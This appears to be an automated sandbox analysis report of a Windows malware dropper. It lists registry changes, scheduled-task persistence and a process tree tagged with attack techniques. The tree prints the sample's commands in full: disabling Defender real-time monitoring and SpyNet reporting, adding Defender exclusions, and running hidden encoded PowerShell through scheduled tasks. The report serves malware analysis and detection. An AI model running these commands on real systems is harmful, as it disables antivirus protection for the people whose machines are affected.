Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	ozHEhQn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	ozHEhQn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	ozHEhQn.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	ozHEhQn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\62-cb-57-1c-e0-66\WpadDetectedUrl	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	ozHEhQn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	ozHEhQn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2B03BFA5-82C6-4210-889A-66CABE6EB73A}\62-cb-57-1c-e0-66	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2B03BFA5-82C6-4210-889A-66CABE6EB73A}\62-cb-57-1c-e0-66	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	ozHEhQn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2700	schtasks.exe
2812	schtasks.exe
1484	schtasks.exe
2428	schtasks.exe
2628	schtasks.exe
2904	schtasks.exe
1484	schtasks.exe
2488	schtasks.exe
1380	schtasks.exe
1820	schtasks.exe
1032	schtasks.exe
2508	schtasks.exe
2604	schtasks.exe

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXEozHEhQn.exe

pid	process
2608	powershell.EXE
2608	powershell.EXE
2608	powershell.EXE
1944	powershell.EXE
1944	powershell.EXE
1944	powershell.EXE
884	powershell.EXE
884	powershell.EXE
884	powershell.EXE
1588	powershell.EXE
1588	powershell.EXE
1588	powershell.EXE
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe
2660	ozHEhQn.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.EXEpowershell.EXEpowershell.EXEpowershell.EXE

description	pid	process
Token: SeDebugPrivilege	2608	powershell.EXE
Token: SeDebugPrivilege	1944	powershell.EXE
Token: SeDebugPrivilege	884	powershell.EXE
Token: SeDebugPrivilege	1588	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exe

description	pid	process	target process
PID 2116 wrote to memory of 996	2116	setup.exe	Install.exe
PID 2116 wrote to memory of 996	2116	setup.exe	Install.exe
PID 2116 wrote to memory of 996	2116	setup.exe	Install.exe
PID 2116 wrote to memory of 996	2116	setup.exe	Install.exe
PID 2116 wrote to memory of 996	2116	setup.exe	Install.exe
PID 2116 wrote to memory of 996	2116	setup.exe	Install.exe
PID 2116 wrote to memory of 996	2116	setup.exe	Install.exe
PID 996 wrote to memory of 2088	996	Install.exe	Install.exe
PID 996 wrote to memory of 2088	996	Install.exe	Install.exe
PID 996 wrote to memory of 2088	996	Install.exe	Install.exe
PID 996 wrote to memory of 2088	996	Install.exe	Install.exe
PID 996 wrote to memory of 2088	996	Install.exe	Install.exe
PID 996 wrote to memory of 2088	996	Install.exe	Install.exe
PID 996 wrote to memory of 2088	996	Install.exe	Install.exe
PID 2088 wrote to memory of 2820	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2820	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2820	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2820	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2820	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2820	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2820	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2752	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2752	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2752	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2752	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2752	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2752	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 2752	2088	Install.exe	forfiles.exe
PID 2820 wrote to memory of 1632	2820	forfiles.exe	cmd.exe
PID 2820 wrote to memory of 1632	2820	forfiles.exe	cmd.exe
PID 2820 wrote to memory of 1632	2820	forfiles.exe	cmd.exe
PID 2820 wrote to memory of 1632	2820	forfiles.exe	cmd.exe
PID 2820 wrote to memory of 1632	2820	forfiles.exe	cmd.exe
PID 2820 wrote to memory of 1632	2820	forfiles.exe	cmd.exe
PID 2820 wrote to memory of 1632	2820	forfiles.exe	cmd.exe
PID 2752 wrote to memory of 2944	2752	forfiles.exe	cmd.exe
PID 2752 wrote to memory of 2944	2752	forfiles.exe	cmd.exe
PID 2752 wrote to memory of 2944	2752	forfiles.exe	cmd.exe
PID 2752 wrote to memory of 2944	2752	forfiles.exe	cmd.exe
PID 2752 wrote to memory of 2944	2752	forfiles.exe	cmd.exe
PID 2752 wrote to memory of 2944	2752	forfiles.exe	cmd.exe
PID 2752 wrote to memory of 2944	2752	forfiles.exe	cmd.exe
PID 1632 wrote to memory of 2704	1632	cmd.exe	reg.exe
PID 1632 wrote to memory of 2704	1632	cmd.exe	reg.exe
PID 1632 wrote to memory of 2704	1632	cmd.exe	reg.exe
PID 1632 wrote to memory of 2704	1632	cmd.exe	reg.exe
PID 1632 wrote to memory of 2704	1632	cmd.exe	reg.exe
PID 1632 wrote to memory of 2704	1632	cmd.exe	reg.exe
PID 1632 wrote to memory of 2704	1632	cmd.exe	reg.exe
PID 2944 wrote to memory of 2700	2944	cmd.exe	reg.exe
PID 2944 wrote to memory of 2700	2944	cmd.exe	reg.exe
PID 2944 wrote to memory of 2700	2944	cmd.exe	reg.exe
PID 2944 wrote to memory of 2700	2944	cmd.exe	reg.exe
PID 2944 wrote to memory of 2700	2944	cmd.exe	reg.exe
PID 2944 wrote to memory of 2700	2944	cmd.exe	reg.exe
PID 2944 wrote to memory of 2700	2944	cmd.exe	reg.exe
PID 1632 wrote to memory of 2852	1632	cmd.exe	reg.exe
PID 1632 wrote to memory of 2852	1632	cmd.exe	reg.exe
PID 1632 wrote to memory of 2852	1632	cmd.exe	reg.exe
PID 1632 wrote to memory of 2852	1632	cmd.exe	reg.exe
PID 1632 wrote to memory of 2852	1632	cmd.exe	reg.exe
PID 1632 wrote to memory of 2852	1632	cmd.exe	reg.exe
PID 1632 wrote to memory of 2852	1632	cmd.exe	reg.exe
PID 2944 wrote to memory of 2440	2944	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe
"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2116
- C:\Users\Admin\AppData\Local\Temp\7zSC487.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:996
- - C:\Users\Admin\AppData\Local\Temp\7zSC62C.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:2088
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Indirect Command Execution
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2820
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1632
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:2704
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:2852
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Indirect Command Execution
      Suspicious use of WriteProcessMemory
      PID:2752
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2944
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2700
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:2440
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gRHhxiFFr" /SC once /ST 04:54:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2812
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gRHhxiFFr"
      4⤵
      PID:1804
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gRHhxiFFr"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1620
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bJbhxhmwQPPePEjnjA" /SC once /ST 08:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\ogQYHMB.exe\" sw /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Scheduled Task/Job: Scheduled Task
      PID:1820

C:\Windows\system32\taskeng.exe
taskeng.exe {7D34B106-08A5-4AD5-9113-C61ED26F356E} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
1⤵
PID:2764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2608
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1944
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2200
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:884
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:816

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1324

C:\Windows\system32\taskeng.exe
taskeng.exe {C3239438-D568-46DE-97FB-C5CB43838BE5} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1536
- C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\ogQYHMB.exe
  C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\ogQYHMB.exe sw /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1016
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gJVfVvJfC" /SC once /ST 00:03:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1032
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gJVfVvJfC"
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gJVfVvJfC"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1064
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1952
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:2216
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:696
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:2512
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ggTNFSVhS" /SC once /ST 00:02:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1484
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ggTNFSVhS"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ggTNFSVhS"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2352
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2908
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2760
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2732
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2000
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3044
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:1112
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2648
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:2860
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\biwNYXhGTKCQxjLv\cmhOiYys\dWuMemSkgQhOHvSI.wsf"
    3⤵
    PID:2392
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\biwNYXhGTKCQxjLv\cmhOiYys\dWuMemSkgQhOHvSI.wsf"
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    PID:2592
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1432
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2380
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2932
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1792
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:3008
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2880
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:3020
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:1608
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1168
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2692
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2152
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2248
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1996
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2516
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      System Location Discovery: System Language Discovery
      PID:2688
  - - C:\Windows\SysWOW64\reg.exe
